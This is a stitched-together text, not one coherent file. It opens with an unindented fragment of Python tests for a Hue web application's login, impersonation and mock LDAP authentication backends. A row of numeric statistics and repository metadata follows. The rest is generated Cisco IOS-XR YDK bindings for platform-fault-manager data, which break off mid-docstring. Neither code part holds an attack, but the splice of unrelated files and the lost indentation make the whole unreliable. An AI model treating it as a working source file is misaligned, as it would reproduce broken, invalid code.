def setUp(self):
self.c = Client()
self.reset.append(
conf.AUTH.BACKEND.set_for_testing(['desktop.auth.backend.AllowFirstUserDjangoBackend'])
)
def tearDown(self):
for finish in self.reset:
finish()
User.objects.all().delete()
if Group.objects.filter(name=self.test_username).exists():
Group.objects.filter(name=self.test_username).delete()
def test_login_does_not_reset_groups(self):
self.reset.append(
conf.AUTH.BACKEND.set_for_testing(["desktop.auth.backend.AllowFirstUserDjangoBackend"])
)
client = make_logged_in_client(username=self.test_username, password="test")
client.get('/accounts/logout')
user = User.objects.get(username=self.test_username)
group, created = Group.objects.get_or_create(name=self.test_username)
user.groups.all().delete()
assert_false(user.groups.exists())
# Webpack bundles not found if follow=True and running test locally
response = client.post('/hue/accounts/login/', dict(username=self.test_username, password="test"))
assert_equal(302, response.status_code)
def test_login_set_auth_backend_in_profile(self):
client = make_logged_in_client(username=self.test_username, password="test")
response = client.post('/hue/accounts/login/', {'username': self.test_username, 'password': 'test'})
assert_equal(302, response.status_code)
user = User.objects.get(username=self.test_username)
existing_profile = get_profile(user)
assert_equal('desktop.auth.backend.AllowFirstUserDjangoBackend', existing_profile.data['auth_backend'])
def test_login_long_username(self):
self.reset.append(
conf.AUTH.BACKEND.set_for_testing(["desktop.auth.backend.AllowFirstUserDjangoBackend"])
)
c = Client()
username = 'a' * 15
user = create_user(username=username, password='test', is_superuser=False)
response = c.post('/hue/accounts/login/', {'username': username, 'password': 'test'})
assert_equal(302, response.status_code)
username = 'a' * 145
user = create_user(username=username, password='test', is_superuser=False)
response = c.post('/hue/accounts/login/', {'username': username, 'password': 'test'})
assert_equal(302, response.status_code)
# 250 is currently the max in the official Django User model.
# We can't create a previou user with more characters as the DB will truncate anyway.
username = 'a' * 255
response = c.post('/hue/accounts/login/', {'username': username, 'password': 'test'})
assert_equal(200, response.status_code)
assert_true(response.context[0]['login_errors'])
class TestImpersonationBackend(object):
test_username = "test_login_impersonation"
test_login_as_username = "test_login_as_impersonation"
@classmethod
def setup_class(cls):
cls.client = make_logged_in_client(username=cls.test_username, password="test")
cls.auth_backends = settings.AUTHENTICATION_BACKENDS
settings.AUTHENTICATION_BACKENDS = ('desktop.auth.backend.ImpersonationBackend',)
@classmethod
def teardown_class(cls):
settings.AUTHENTICATION_BACKENDS = cls.auth_backends
def setUp(self):
self.reset = [conf.AUTH.BACKEND.set_for_testing(['desktop.auth.backend.ImpersonationBackend'])]
def tearDown(self):
for finish in self.reset:
finish()
def test_login_does_not_reset_groups(self):
self.client.get('/accounts/logout')
user = User.objects.get(username=self.test_username)
group, created = Group.objects.get_or_create(name=self.test_username)
response = self.client.post('/hue/accounts/login/', dict(username=self.test_username, password="test", login_as=self.test_login_as_username), follow=True)
assert_equal(200, response.status_code)
assert_equal(self.test_login_as_username, response.context[0]['user'].username)
class MockLdapBackend(object):
settings = django_auth_ldap_backend.LDAPSettings()
def get_or_create_user(self, username, ldap_user):
return User.objects.get_or_create(username)
def authenticate(self, username=None, password=None, server=None):
user, created = self.get_or_create_user(username, None)
return user
def get_user(self, user_id):
return User.objects.get(id=user_id)
| 40.275056 | 167 | 0.723809 | 4,793 | 36,167 | 5.270812 | 0.079491 | 0.057475 | 0.070934 | 0.051459 | 0.827099 | 0.797886 | 0.785813 | 0.770336 | 0.75664 | 0.73669 | 0 | 0.009165 | 0.143252 | 36,167 | 897 | 168 | 40.319955 | 0.806138 | 0.079105 | 0 | 0.743631 | 0 | 0.001592 | 0.165599 | 0.039414 | 0 | 0 | 0 | 0 | 0.214968 | 1 | 0.103503 | false | 0.084395 | 0.039809 | 0.004777 | 0.19586 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
8a8ef57f8e17c09f57f6de260dc58bdb2f612ac5 | 157,030 | py | Python | cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_pfm_oper.py | CiscoDevNet/ydk-py | 073731fea50694d0bc6cd8ebf10fec308dcc0aa9 | [
"ECL-2.0",
"Apache-2.0"
] | 177 | 2016-03-15T17:03:51.000Z | 2022-03-18T16:48:44.000Z | cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_pfm_oper.py | CiscoDevNet/ydk-py | 073731fea50694d0bc6cd8ebf10fec308dcc0aa9 | [
"ECL-2.0",
"Apache-2.0"
] | 18 | 2016-03-30T10:45:22.000Z | 2020-07-14T16:28:13.000Z | cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_pfm_oper.py | CiscoDevNet/ydk-py | 073731fea50694d0bc6cd8ebf10fec308dcc0aa9 | [
"ECL-2.0",
"Apache-2.0"
] | 85 | 2016-03-16T20:38:57.000Z | 2022-02-22T04:26:02.000Z | """ Cisco_IOS_XR_pfm_oper
This module contains a collection of YANG definitions
for Cisco IOS\-XR pfm package operational data.
This module contains definitions
for the following management objects\:
platform\-fault\-manager\: PFM data space
Copyright (c) 2013\-2018 by Cisco Systems, Inc.
All rights reserved.
"""
import sys
from collections import OrderedDict
from ydk.types import Entity as _Entity_
from ydk.types import EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
class PlatformFaultManager(_Entity_):
"""
PFM data space
.. attribute:: exclude
Exclude specic hw fault
**type**\: :py:class:`Exclude <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude>`
**config**\: False
.. attribute:: racks
Table of racks
**type**\: :py:class:`Racks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Racks>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(PlatformFaultManager, self).__init__()
self._top_entity = None
self.yang_name = "platform-fault-manager"
self.yang_parent_name = "Cisco-IOS-XR-pfm-oper"
self.is_top_level_class = True
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("exclude", ("exclude", PlatformFaultManager.Exclude)), ("racks", ("racks", PlatformFaultManager.Racks))])
self._leafs = OrderedDict()
self.exclude = PlatformFaultManager.Exclude()
self.exclude.parent = self
self._children_name_map["exclude"] = "exclude"
self.racks = PlatformFaultManager.Racks()
self.racks.parent = self
self._children_name_map["racks"] = "racks"
self._segment_path = lambda: "Cisco-IOS-XR-pfm-oper:platform-fault-manager"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(PlatformFaultManager, [], name, value)
class Exclude(_Entity_):
"""
Exclude specic hw fault
.. attribute:: fault_type1s
Table of Hardware Failure Device
**type**\: :py:class:`FaultType1s <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(PlatformFaultManager.Exclude, self).__init__()
self.yang_name = "exclude"
self.yang_parent_name = "platform-fault-manager"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("fault-type1s", ("fault_type1s", PlatformFaultManager.Exclude.FaultType1s))])
self._leafs = OrderedDict()
self.fault_type1s = PlatformFaultManager.Exclude.FaultType1s()
self.fault_type1s.parent = self
self._children_name_map["fault_type1s"] = "fault-type1s"
self._segment_path = lambda: "exclude"
self._absolute_path = lambda: "Cisco-IOS-XR-pfm-oper:platform-fault-manager/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(PlatformFaultManager.Exclude, [], name, value)
class FaultType1s(_Entity_):
"""
Table of Hardware Failure Device
.. attribute:: fault_type1
Table of Hardware Failure Device
**type**\: list of :py:class:`FaultType1 <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(PlatformFaultManager.Exclude.FaultType1s, self).__init__()
self.yang_name = "fault-type1s"
self.yang_parent_name = "exclude"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("fault-type1", ("fault_type1", PlatformFaultManager.Exclude.FaultType1s.FaultType1))])
self._leafs = OrderedDict()
self.fault_type1 = YList(self)
self._segment_path = lambda: "fault-type1s"
self._absolute_path = lambda: "Cisco-IOS-XR-pfm-oper:platform-fault-manager/exclude/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s, [], name, value)
class FaultType1(_Entity_):
"""
Table of Hardware Failure Device
.. attribute:: hw_fault_type1 (key)
hw fault 1
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
**config**\: False
.. attribute:: fault_type2s
Table of Hardware Failure Device
**type**\: :py:class:`FaultType2s <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s>`
**config**\: False
.. attribute:: racks
Table of racks
**type**\: :py:class:`Racks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(PlatformFaultManager.Exclude.FaultType1s.FaultType1, self).__init__()
self.yang_name = "fault-type1"
self.yang_parent_name = "fault-type1s"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['hw_fault_type1']
self._child_classes = OrderedDict([("fault-type2s", ("fault_type2s", PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s)), ("racks", ("racks", PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks))])
self._leafs = OrderedDict([
('hw_fault_type1', (YLeaf(YType.str, 'hw-fault-type1'), ['str'])),
])
self.hw_fault_type1 = None
self.fault_type2s = PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s()
self.fault_type2s.parent = self
self._children_name_map["fault_type2s"] = "fault-type2s"
self.racks = PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks()
self.racks.parent = self
self._children_name_map["racks"] = "racks"
self._segment_path = lambda: "fault-type1" + "[hw-fault-type1='" + str(self.hw_fault_type1) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-pfm-oper:platform-fault-manager/exclude/fault-type1s/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1, ['hw_fault_type1'], name, value)
class FaultType2s(_Entity_):
"""
Table of Hardware Failure Device
.. attribute:: fault_type2
Table of Hardware Failure Device
**type**\: list of :py:class:`FaultType2 <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s, self).__init__()
self.yang_name = "fault-type2s"
self.yang_parent_name = "fault-type1"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("fault-type2", ("fault_type2", PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2))])
self._leafs = OrderedDict()
self.fault_type2 = YList(self)
self._segment_path = lambda: "fault-type2s"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s, [], name, value)
class FaultType2(_Entity_):
"""
Table of Hardware Failure Device
.. attribute:: hw_fault_type2 (key)
hw fault 2
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
**config**\: False
.. attribute:: fault_type3s
Table of Hardware Failure Device
**type**\: :py:class:`FaultType3s <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s>`
**config**\: False
.. attribute:: racks
Table of racks
**type**\: :py:class:`Racks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2, self).__init__()
self.yang_name = "fault-type2"
self.yang_parent_name = "fault-type2s"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['hw_fault_type2']
self._child_classes = OrderedDict([("fault-type3s", ("fault_type3s", PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s)), ("racks", ("racks", PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks))])
self._leafs = OrderedDict([
('hw_fault_type2', (YLeaf(YType.str, 'hw-fault-type2'), ['str'])),
])
self.hw_fault_type2 = None
self.fault_type3s = PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s()
self.fault_type3s.parent = self
self._children_name_map["fault_type3s"] = "fault-type3s"
self.racks = PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks()
self.racks.parent = self
self._children_name_map["racks"] = "racks"
self._segment_path = lambda: "fault-type2" + "[hw-fault-type2='" + str(self.hw_fault_type2) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2, ['hw_fault_type2'], name, value)
class FaultType3s(_Entity_):
"""
Table of Hardware Failure Device
.. attribute:: fault_type3
Table of Hardware Failure Device
**type**\: list of :py:class:`FaultType3 <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s, self).__init__()
self.yang_name = "fault-type3s"
self.yang_parent_name = "fault-type2"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("fault-type3", ("fault_type3", PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3))])
self._leafs = OrderedDict()
self.fault_type3 = YList(self)
self._segment_path = lambda: "fault-type3s"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s, [], name, value)
class FaultType3(_Entity_):
"""
Table of Hardware Failure Device
.. attribute:: hw_fault_type3 (key)
hw fault 3
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
**config**\: False
.. attribute:: racks
Table of racks
**type**\: :py:class:`Racks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3, self).__init__()
self.yang_name = "fault-type3"
self.yang_parent_name = "fault-type3s"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['hw_fault_type3']
self._child_classes = OrderedDict([("racks", ("racks", PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks))])
self._leafs = OrderedDict([
('hw_fault_type3', (YLeaf(YType.str, 'hw-fault-type3'), ['str'])),
])
self.hw_fault_type3 = None
self.racks = PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks()
self.racks.parent = self
self._children_name_map["racks"] = "racks"
self._segment_path = lambda: "fault-type3" + "[hw-fault-type3='" + str(self.hw_fault_type3) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3, ['hw_fault_type3'], name, value)
class Racks(_Entity_):
"""
Table of racks
.. attribute:: rack
Number
**type**\: list of :py:class:`Rack <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks, self).__init__()
self.yang_name = "racks"
self.yang_parent_name = "fault-type3"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("rack", ("rack", PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack))])
self._leafs = OrderedDict()
self.rack = YList(self)
self._segment_path = lambda: "racks"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks, [], name, value)
class Rack(_Entity_):
"""
Number
.. attribute:: rack (key)
Rack number
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: slots
Table of slots
**type**\: :py:class:`Slots <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack, self).__init__()
self.yang_name = "rack"
self.yang_parent_name = "racks"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['rack']
self._child_classes = OrderedDict([("slots", ("slots", PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots))])
self._leafs = OrderedDict([
('rack', (YLeaf(YType.uint32, 'rack'), ['int'])),
])
self.rack = None
self.slots = PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots()
self.slots.parent = self
self._children_name_map["slots"] = "slots"
self._segment_path = lambda: "rack" + "[rack='" + str(self.rack) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack, ['rack'], name, value)
class Slots(_Entity_):
"""
Table of slots
.. attribute:: slot
Name
**type**\: list of :py:class:`Slot <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots.Slot>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots, self).__init__()
self.yang_name = "slots"
self.yang_parent_name = "rack"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("slot", ("slot", PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots.Slot))])
self._leafs = OrderedDict()
self.slot = YList(self)
self._segment_path = lambda: "slots"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots, [], name, value)
class Slot(_Entity_):
"""
Name
.. attribute:: slot (key)
Slot name
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
**config**\: False
.. attribute:: fault_summary
Table of Hardware Summary
**type**\: :py:class:`FaultSummary <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots.Slot.FaultSummary>`
**config**\: False
.. attribute:: hardware_fault_devices
Table of Hardware Failure
**type**\: :py:class:`HardwareFaultDevices <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots.Slot.HardwareFaultDevices>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots.Slot, self).__init__()
self.yang_name = "slot"
self.yang_parent_name = "slots"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['slot']
self._child_classes = OrderedDict([("fault-summary", ("fault_summary", PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots.Slot.FaultSummary)), ("hardware-fault-devices", ("hardware_fault_devices", PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots.Slot.HardwareFaultDevices))])
self._leafs = OrderedDict([
('slot', (YLeaf(YType.str, 'slot'), ['str'])),
])
self.slot = None
self.fault_summary = PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots.Slot.FaultSummary()
self.fault_summary.parent = self
self._children_name_map["fault_summary"] = "fault-summary"
self.hardware_fault_devices = PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots.Slot.HardwareFaultDevices()
self.hardware_fault_devices.parent = self
self._children_name_map["hardware_fault_devices"] = "hardware-fault-devices"
self._segment_path = lambda: "slot" + "[slot='" + str(self.slot) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots.Slot, ['slot'], name, value)
class FaultSummary(_Entity_):
"""
Table of Hardware Summary
.. attribute:: severity_critical_count
Fault Severity Critical count
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
.. attribute:: severity_emergency_or_alert_count
Fault Severity Emergency count
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
.. attribute:: total
Faulty Hardware total count
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
.. attribute:: severity_error_count
Fault Severity Error count
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots.Slot.FaultSummary, self).__init__()
self.yang_name = "fault-summary"
self.yang_parent_name = "slot"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('severity_critical_count', (YLeaf(YType.int32, 'severity-critical-count'), ['int'])),
('severity_emergency_or_alert_count', (YLeaf(YType.int32, 'severity-emergency-or-alert-count'), ['int'])),
('total', (YLeaf(YType.int32, 'total'), ['int'])),
('severity_error_count', (YLeaf(YType.int32, 'severity-error-count'), ['int'])),
])
self.severity_critical_count = None
self.severity_emergency_or_alert_count = None
self.total = None
self.severity_error_count = None
self._segment_path = lambda: "fault-summary"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots.Slot.FaultSummary, ['severity_critical_count', 'severity_emergency_or_alert_count', 'total', 'severity_error_count'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
return meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots.Slot.FaultSummary']['meta_info']
class HardwareFaultDevices(_Entity_):
"""
Table of Hardware Failure
.. attribute:: hardware_fault_device
Table of Hardware Failure Device
**type**\: list of :py:class:`HardwareFaultDevice <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots.Slot.HardwareFaultDevices, self).__init__()
self.yang_name = "hardware-fault-devices"
self.yang_parent_name = "slot"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("hardware-fault-device", ("hardware_fault_device", PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice))])
self._leafs = OrderedDict()
self.hardware_fault_device = YList(self)
self._segment_path = lambda: "hardware-fault-devices"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots.Slot.HardwareFaultDevices, [], name, value)
class HardwareFaultDevice(_Entity_):
"""
Table of Hardware Failure Device
.. attribute:: hw_fault_device (key)
hw fault device list
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
**config**\: False
.. attribute:: hardware_fault_type
Table of Hardware Failure Type
**type**\: list of :py:class:`HardwareFaultType <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice.HardwareFaultType>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice, self).__init__()
self.yang_name = "hardware-fault-device"
self.yang_parent_name = "hardware-fault-devices"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['hw_fault_device']
self._child_classes = OrderedDict([("hardware-fault-type", ("hardware_fault_type", PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice.HardwareFaultType))])
self._leafs = OrderedDict([
('hw_fault_device', (YLeaf(YType.str, 'hw-fault-device'), ['str'])),
])
self.hw_fault_device = None
self.hardware_fault_type = YList(self)
self._segment_path = lambda: "hardware-fault-device" + "[hw-fault-device='" + str(self.hw_fault_device) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice, ['hw_fault_device'], name, value)
class HardwareFaultType(_Entity_):
"""
Table of Hardware Failure Type
.. attribute:: hw_fault_type (key)
hw fault type list
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
**config**\: False
.. attribute:: condition_description
Faulty Hardware Condition Description
**type**\: str
**config**\: False
.. attribute:: condition_name
Faulty Hardware Condition Name
**type**\: str
**config**\: False
.. attribute:: device_key
Faulty Hardware Device Key
**type**\: str
**config**\: False
.. attribute:: device_version
